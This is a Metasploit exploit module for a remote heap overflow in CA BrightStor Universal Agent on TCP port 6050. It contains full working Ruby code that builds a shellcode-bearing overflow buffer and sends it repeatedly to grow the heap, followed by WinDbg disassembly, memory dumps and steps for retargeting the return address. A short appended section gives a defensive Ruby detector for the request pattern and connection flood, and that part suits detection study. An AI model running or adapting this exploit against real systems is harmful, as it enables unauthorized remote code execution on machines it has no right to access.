##
# $Id: universal_agent.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Universal Agent Overflow',
			'Description'    => %q{
				This module exploits a convoluted heap overflow in the CA
				BrightStor Universal Agent service. Triple userland exception
				results in heap growth and execution of dereferenced function
				pointer at a specified address.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2005-1018'],
					[ 'OSVDB', '15471' ],
					[ 'BID', '13102'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
					'Space'           => 164,
					'BadChars'        => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[ 'Magic Heap Target #1',
						{
							'Platform' => 'win',
							'Ret'      => 0x01625c44, # We grow to our own return address
						},
					],
				],
			'DisclosureDate' => 'Apr 11 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(6050)
			], self.class)
	end

	def exploit
		print_status("Trying target #{target.name}...")

		# The server reverses four bytes starting at offset 0xa5 :0

		# Create the overflow string
		boom = 'X' * 1024

		# Required field to trigger the fault
		boom[248, 2] = [1000].pack('V')

		# The shellcode, limited to 250 bytes (no nulls)
		boom[256, payload.encoded.length] = payload.encoded

		# This should point to itself
		boom[576, 4] = [target.ret].pack('V')

		# This points to the code below
		boom[580, 4] = [target.ret + 8].pack('V')

		# We have 95 bytes, use it to hop back to shellcode
		boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"

		# Stick the protocol header in front of our request
		req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom

		# We keep making new connections and triggering the fault until
		# the heap is grown to encompass our known return address. Once
		# this address has been allocated and filled, each subsequent
		# request will result in our shellcode being executed.
		1.upto(200) {|i|
			connect
			print_status("Sending request #{i} of 200...") if (i % 10) == 0
			sock.put(req)
			disconnect

			# Give the process time to recover from each exception
			select(nil,nil,nil,0.1);
		}

		handler
	end

end

__END__

012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]          ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service, and
run it through again.

Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
[ snip ]
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
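Added defender-side example, not part of this module or of the Metasploit Framework: a Ruby check for the two things a network sensor can observe from this exploit, the request shape (the protocol header above followed by an oversized field made of one repeated filler byte) and the burst of up to 200 short-lived connections to TCP/6050. The header bytes and the 1024-byte field size are taken from the module; the run-length and connection-rate thresholds, the log-line format and all sample data are assumptions constructed for the example.

```ruby
# Header and field size come from the module; thresholds are assumptions.
AGENT_HEADER = "\x00\x00\x00\x00\x03\x20\xa8\x02".b # protocol header the module sends
MIN_BODY     = 1024   # the module's overflow string is 1024 filler bytes
MIN_RUN      = 200    # a legitimate field is unlikely to repeat one byte this often
MAX_CONNS    = 50     # connections per source per window before we call it a flood

# True when a request to the agent port looks like the overflow: known header,
# oversized body, and a long run of a single filler byte ('X' in the module).
def overflow_request?(req)
  return false unless req.bytesize >= AGENT_HEADER.bytesize + MIN_BODY
  return false unless req.byteslice(0, AGENT_HEADER.bytesize) == AGENT_HEADER
  body = req.byteslice(AGENT_HEADER.bytesize..-1)
  longest_run = body.bytes.chunk_while { |a, b| a == b }.map(&:size).max
  longest_run >= MIN_RUN
end

# Sources that opened at least `threshold` connections to 6050 inside any
# `window` seconds. Constructed log-line format: "<epoch> <src> <dport> <bytes>"
def flood_sources(log_lines, window: 60, threshold: MAX_CONNS)
  by_src = Hash.new { |h, k| h[k] = [] }
  log_lines.each do |line|
    ts, src, dport, _bytes = line.split
    by_src[src] << ts.to_i if dport == "6050"
  end
  by_src.select { |_src, times|
    times.sort!
    times.each_index.any? { |i|
      # index of the first timestamp outside the window starting at times[i]
      j = times.bsearch_index { |t| t > times[i] + window } || times.size
      j - i >= threshold
    }
  }.keys
end

# Constructed samples (not captured traffic): one request shaped like the
# module's, one small benign request, and a connection log containing a flood.
SAMPLE_EXPLOIT_REQ = AGENT_HEADER + ("X" * 1024).b
SAMPLE_BENIGN_REQ  = AGENT_HEADER + "hostinfo".b
SAMPLE_LOG = (0...60).map { |i| "#{1000 + i / 10} 10.0.0.5 6050 1034" } +
             ["1005 10.0.0.7 6050 64", "1010 10.0.0.7 6050 64"]

if __FILE__ == $0
  puts "exploit-shaped: #{overflow_request?(SAMPLE_EXPLOIT_REQ)}" # true
  puts "benign:         #{overflow_request?(SAMPLE_BENIGN_REQ)}"  # false
  puts "flood sources:  #{flood_sources(SAMPLE_LOG).inspect}"    # ["10.0.0.5"]
end
```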